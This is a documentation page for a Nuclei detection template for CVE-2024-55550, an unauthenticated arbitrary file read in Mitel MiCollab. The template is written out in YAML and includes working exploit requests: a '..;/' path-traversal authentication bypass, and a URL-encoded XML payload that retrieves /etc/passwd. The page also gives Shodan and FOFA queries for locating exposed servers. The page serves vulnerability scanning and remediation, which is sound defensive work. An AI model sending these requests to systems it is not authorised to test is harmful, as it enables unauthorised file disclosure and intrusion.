Skip to content
Nuclei Templates

Mitel MiCollab - Arbitary File Read

ID: CVE-2024-55550

Severity: critical

Author: DhiyaneshDk,watchTowr

Tags: cve,cve2024,mitel,lfi,cmg-suite,auth-bypass,kev

Description

Section titled “Description”

The Mitel Collab Arbitrary File Read vulnerability allows an unauthenticated attacker to read arbitrary files from the underlying file system on a Mitel Collab server. Exploiting this flaw involves sending specially crafted requests to the server, bypassing access controls and allowing the attacker to retrieve sensitive files.

YAML Source

Section titled “YAML Source”
id: CVE-2024-55550


info:
  name: Mitel MiCollab - Arbitary File Read
  author: DhiyaneshDk,watchTowr
  severity: critical
  description: |
    The Mitel Collab Arbitrary File Read vulnerability allows an unauthenticated attacker to read arbitrary files from the underlying file system on a Mitel Collab server. Exploiting this flaw involves sending specially crafted requests to the server, bypassing access controls and allowing the attacker to retrieve sensitive files.
  remediation: |
    Ensure that the application properly validates and sanitizes user input to prevent directory traversal attacks. Use a whitelist approach for allowed directories and employ proper access controls.
  reference:
    - https://github.com/watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
  metadata:
    verified: true
    max-request: 2
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve2024,mitel,lfi,cmg-suite,auth-bypass,kev


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "users"
          - "Network Element"
        condition: and
        internal: true


  - raw:
      - |
        POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2F10%2FXMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+xsi%3Atype%3D%22xsd%3Along%22%3E2%3C%2FtransactionNum%3E%3Coperations+xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E%3Ccriteria+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3E..%2F..%2F..%2Fetc%2Fpasswd%3C%2FreportName%3E%3C%2Fcriteria%3E%3CoperationConfig+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CdataSource%3Esummary_reports%3C%2FdataSource%3E%3CoperationType%3Efetch%3C%2FoperationType%3E%3C%2FoperationConfig%3E%3CappID%3EbuiltinApplication%3C%2FappID%3E%3Coperation%3EdownloadReport%3C%2Foperation%3E%3ColdValues+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3Ex.txt%3C%2FreportName%3E%3C%2FoldValues%3E%3C%2Felem%3E%3C%2Foperations%3E%3Cjscallback%3Ex%3C%2Fjscallback%3E%3C%2Ftransaction%3E&protocolVersion=1.0&__iframeTarget__=x


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "micollab_api:.*:.*"
# digest: 4a0a0047304502206dc01b21b33e157d133b796618d8ad99c4e72aa762d0bc2eecb6ce799a605463022100fe4f0e7d9065b28f5e11876d73666e3d3cb4f2a0871720ce8be19809adf4f9c8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-55550.yaml"

View on Github